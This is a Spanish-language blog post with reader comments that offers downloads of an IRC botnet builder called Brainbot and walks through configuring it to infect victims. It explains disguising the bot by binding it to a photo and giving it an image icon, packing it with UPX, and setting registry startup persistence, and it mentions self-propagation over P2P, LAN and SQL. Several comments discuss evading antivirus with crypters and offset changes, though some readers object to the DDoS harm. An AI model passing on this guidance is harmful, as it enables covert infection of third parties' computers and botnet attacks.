A pedido de los usuarios posteo este bot, es muy facil de configurar y es bastante estable, es con el bot que yo empese.
Una de sus mejores caracteristicas es su propia propagacion, tiene propagacion por p2p, irc, lan, y sql.
Incluye un binder, un compresor upx, posibildad de cambiar el icono y metodos de inicio.
Explico un poco como se configura:
Irc server:Aqui colocamos la direccion del servidor irc que utilizemos, recomiendo utilizar una cuenta no-ip o cdmon que redireccione al servidor para no perder los bot por si cierran el servidor o los banean, generalmente los banean muy rapido si tienen muchos bots, pueden buscar servidores irc en google.
Irc port: El puerto del servidor irc, generalmente 6667
Channel: Pongan el canal donde se conectaran los bot, por ejemplo #botnet
Fixed name: Los nick que tendran los bot cuando se conecten al servidor, por ejemplo Bot-
Masternick:
Esto es importante, es el nick que usaran ustedes para conectarse, es el que deben seleccionar en el cliente irc, si no se conectan con ese nick los bot no les daran bola. Ej: mauro892
Password: Su pasword para conectarse, es el que usaran para conectarse cuando introduscan el comando !login. Ej: 123465
Bind file: Seleccionamos el archivo con el que queremos juntar el bot, por ejemplo una foto.
Change icon: Seleccionamos el icono del bot, por ejemplo el de una imagen jpg
Upx: Marcamos para comprimir el bot
Startup: Introduciomos un nombre para una clave de registro (por ejemplo winr32), y el nombre del ejecutable para instalar en la carpeta de win (ej bootload)
Eso es todo lo basico para que el server funcione, ahora le damos build y a infectar, Despues explicare los metodos de spread para que el bot se propague.
Para ver los comandos del bot introducen !commands, en el cliente irc.
Tambien pueden leer el readme del archivo para ver las caracteristicas del bot, y para ver mas detalladamente como se introducen los comandos.
si tienen alguna duda con respecto a los comandos lo comentan aca y les contesto.
Descarga:
Brainbot V1.5 (megaupload)
Brainbot V1.5 (rapidshare)
Brainbot v1.5 (trojanfrance, sin dependencias)
Entradas
29 comentarios:
Mauro:
Seamos realistas, los ¿hackers? con algo de experiencia se nutren de foros encambio acá vienen los nuevos que quieren que le den de comer con una cuchara en la boca.
sin ánimo de ofender, me parece que los que visitan troyanosyvirus no están preparados para que les enseñes sobre botnets ya que todavía no tienen los códigos éticos que con el tiempo adquiere el que se mueve en este mundillo.
Muchas buenas páginas y foros estan hoy en día caidos por culpa de la proliferación de estas herramientas y vos lo que estás haciendo es contribuir a que los lamers jodan a gente bien intencionada que monta un foro para compartir su aficion.
Me da mucha pena la situación actual ya que visito unas 8 páginas de hack todos las semanas y siempre encuentro un par caíadas por ataques DDOS.
Ya te han llamado la atención gente de webs prestigiosas como http://elladodelmal.blogspot.com/2008/04/salvajes.html
y El Brujo de el hacker.net. Espero que retires esta información y recapacites por el bien de todos ya que estás escupiendo para arriba.
Porqué no se dejan de romper las pelotas con esos comentarios, no sé a ustedes, pero yo que he sacado muy buenos recursos de esta página me enferma que salten estos giles diciendo que los que la visitamos somos estúpidos?, perdón sabio!, hacker de los hackers!! pero yo defiendo que se comparta la información y el conocimiento..
AY ANONIMO QUE ETICA HACKER ME VAS A ROMPER EL CORAZON :( JAJAJAJAJAJA
VALE SIMPLEMENTE ES BUENA INFO Y SI NO LA ENCONTRAMOS ACA EN OTRO LADO LA VAN A ENCONTRAR O HASTA TU LA VAS A BRINDAR OK? SUERTE Y YA NO ME ROMPAS EL CORAZON CON TU ETICA HACKER JAJAJA....
anónimo tiene razón
Al bot lo envié a VT y lo detectan todos los AV.
Encriptado con Small Crypter lo detectan 17 y pronto lo detectarán todos.
Mauro, a ver de que te sirven los aduladores cuando te visite cana.
Gonza lo detectan por gente PENDEJA como tu cabron de meirda que manda todo a Vt!!!
por eso CHTPM gonza
este bot es viejisimo lo detectan hasta lo ciegos...
pero si le odifican los offsets se puede hacer muy indetectable ^^
son paginas de aprendizaje, nada +
El conocimiento debe de estar al alcance de todos.
al primer anonimo me pasa por los huevos lo q dijiste, no cambiare. no te borre el post porq me dio lastima no mas, vi q te demoraste mucho en escribir eso..
y por otro lado el bot es viejisimooo, es del 2004 pero funciona bien y es facil configurar, ademas son faciles de dejarlo indetectable.
perdon pero es cierto eso q digo mucha gente hace mierda los metodoz de encrptacon por q lo mandan a VT si fuera un bot nuevo y no lo detectaran todos los av ya empesarian a detectarlo te lo digo porq eh hecho pruebas
anonimo del ultimo tenes toda la razon, cuando suben los archivos a vt se envian las muestras a los labs y a los 2 dias ya lo detectan, yo nunca dije q no, yo le dije al anonimo del primer comentario.. eso es porq todos se ponen anonimos :S..
de todas formas siempre habra alguien q lo suba a vt, por eso existen las herramientas privadas
Hola MAURO!
COmo hago para redirigir los bots a mi no-ip? no se en que opcion ponerlo.
Gracias!
Yo tengo esa duda! es decir eso del no -ip no me quedo claro... respecto a este tema del bot
hola, es una gran pagina, no se porque hay gente que se queja de que mauro comparta la informacion con el resto del mundo
por cierto me lo detecta como troyano, se que ai k desactivar el AV para descargar hacks tools
pero mi inexperiencia me hace dudar de que no tenga nada >.<"
gracias
HOLA BUENAS LO PRIMERO AGRADECERTE ESTA WEB KE ES UN LUJO lo segundo preguntarte mira yo hago todos los pasos uno a uno y me da este error
rum time error "75"
path/file acces error
si pudieses ayudarme te lo agradeceria muchas gracias un saludo
andrea: usa cdmon, en la parte de dominio dinamico pone la direccion de tu servidor irc, y en el bot pone tu dominio cdmon..
---------
alcon: gracias y no te preocupes que el archivo esta limpio
--------
Eazy: agregado...
-----
Djvid: eso creo que se deve a que utilizas win vista u otro sistema operativo no compatible
y como se modifican los offset
hola de nuevo haber yo uso windows xp profesional sp2 ke kreo ke si es compatible
Buenas, es medio viejo el post del primer anonimo pero me parece que no piensa en la totalidad del asunto. Que algunas personas utilicen esto para fines "poco eticos" es una cosa, pero no tiene nada que ver con la persona que da la info, sino por favor anda a quejarte al dueño de google :) porque esta info esta disponible en muchas mas paginas. Ahora, tambien hay utilidades eticas para las botnets :), por ej: voltear paginas porno o de otro tipo de contenido inapropiado. Asi que pensa un poco mas antes de criticar
i obtener error de tiempo de ejecución 75 No se encuentra el archivo
i el uso de Vista
i get a file error 75 run file not found
i use windows vista
Botnets ??? NEts de Zombies porfaVOR administrador de esta web no es el caso hacer este tipo de publicaciones q solo dañan a terceros en vez de crear o fomentar la cultra hack solo fomenta la cultura LAMMER !!
Los hacks como dicen llamar esta info no es correcto un hack no hace esto " ANALISIS , MEJORAR y publicar "
COmento para este tipo de ataques ay soluciones XD
PD
MAS RESPETO PARA EL TERMINO HACK NO MANCHEMOS DE PORKERIA A LOS PIONEROS DE EL ARTE
SALUDOS
DEan WOzzniak
Seguridad de redes
cada quien utiliza la informacion como mejor le convenga, el que no quiera entrar que se quede viendo telenovelas o cambiando pañales, esto es solo informacion, y nadie nace sabiendo, por algo se empieza, mauro pone la informacion, es cuestion de cada quien si tiene etica o no tiene madre, no somos la hermana teresa de calcuta, todos sabemos a lo que venimos y no, esto no es hacker, pero tampoco de lammers, es cuestion de cada persona como se comporte.........dejense de mariconadas, sino les gusta no vengan....ezdkrlos@gmail por si quieren dejar algun comentario.
Bueno respecto a los comentarios de la cultura "Lamer" quiero decirles que somos gente que quiere aprender sobre lo que los hackers contruyen, pero muchos de nosotros al no conocer el verdadero conocimiento del objetivo y cultura hacker, decidimos experimentar con este tipo de programas y como la mayoria de estoy son de uso dañino solo buscamos dañar con lo que algunos llegan a crackers, gente que solo busca fregar a los demas, pero bueno, yo ora si, si me quieren poner las ofensas que quieran y puedan haganlo no m importa solo les pido que me aconsejen yo si quiero aprender pero no se ni como iniciar, Mauro por favor, necesito instrucciones de gente con experiencia como tu y otros que entran constantemente a este blog, por favor ayudenme yo si quiero aprender y no tengo recursos necesarios para aprender por otros medios, mi correo es "antonio_resident@hotmail.com", agregenme, me gustaria que ustedes me educaran hacia la cultura hack
Hola mauro, te felicito por tu blog.
yo tengo el mismo error
rum time error "75"
path/file acces error
y yo estoy usando un xp servipack 2
te agradezco cualquier ayuda.
Gracias
que risa me da al ver como se mueren por ser y que hacker jajaj lo peor es que lo intentan s con la pc que les compro su mami
lo siento por mi poca experiencia pero a que sirve este bot?he mirado en internet y dicen que es para automatizar juegos pero no me pareze que este haga esto...
gracias
WOzzniak por que no haces arte conmigo y me lames las porongas xd salu2 mauro buen post
Publicar un comentario en la entrada